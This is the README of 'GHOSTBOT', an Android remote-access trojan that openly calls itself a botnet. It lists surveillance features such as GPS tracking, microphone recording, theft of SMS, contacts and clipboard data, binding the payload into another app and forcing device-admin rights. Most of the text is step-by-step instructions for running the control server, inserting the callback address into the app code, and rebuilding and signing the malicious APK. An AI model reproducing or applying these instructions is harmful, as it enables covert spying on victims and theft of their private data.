A cloud based remote android managment suite(Botnet), powered by NodeJS
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built In APK Builder
- Easily Bind with Another Apk
- Enable Device Admin Apk
- Enable all permission in run time
- Java Runtime Environment 8
- See installation for OS specifics
- NodeJs
- A Server
-
Install JRE 8 (We cannot stress this enough USE java 1.8.0 ANY issues that dont use this will be closed WITHOUT a response)
- Debian, Ubuntu, Etc
sudo apt-get install openjdk-8-jre
- Fedora, Oracle, Red Hat, etc
su -c "yum install java-1.8.0-openjdk"
- Windows
- click HERE for downloads
- Debian, Ubuntu, Etc
-
Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this)
-
install PM2
npm install pm2 -g
-
In the extracted folder, run these commands
npm install
<- install dependenciespm2 start index.js
<-- start the scriptpm2 startup
<- to run GHOSTBOT on startup
-
Set a Username & Password
- Stop GHOSTBOT
pm2 stop index
- Open
maindb.json
in a text editor - under
admin
- set the
username
as plain text - set the
password
as a LOWERCASE MD5 hash
- set the
- save the file
- run
pm2 restart all
- Stop GHOSTBOT
-
in your browser navigate to
http://<SERVER IP>:22533
Go to com/etechd/l3mon/IOSocket.smali Go line No 77 add
Listening address as "http://webaddress?model=" Save Recompile & Signed.
$/> sudo apt-get install apktool
Go To /app/factory folder unzip the ghostbot-apktool-compiler, commands below
$/> apktool b ghostbot-apktool-compiler -o GHOSTBOT.apk
$/> sudo apt-get install apksigner
$/> sudo apt-get install zipalign
#~ Generate Key
$/> keytool -genkey -v -keystore my.keystore -keyalg RSA -keysize 2048 -validity 10000 -alias
app
#~ align apk
$/> zipalign -p 4 GHOSTBOT.apk Aligned-Ghostbot.apk
#~ Verify aligned apk
$/> zipalign -c 4 Aligned-Ghostbot.apk
#~ Sign by generated key
$/> jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my.keystore
Aligned-Ghostbot.apk my_alias_name
#~ verify signature
$/> jarsigner -verify -verbose Aligned-Ghostbot.apk
Made with 💀 By Ghosthub
v0.1.3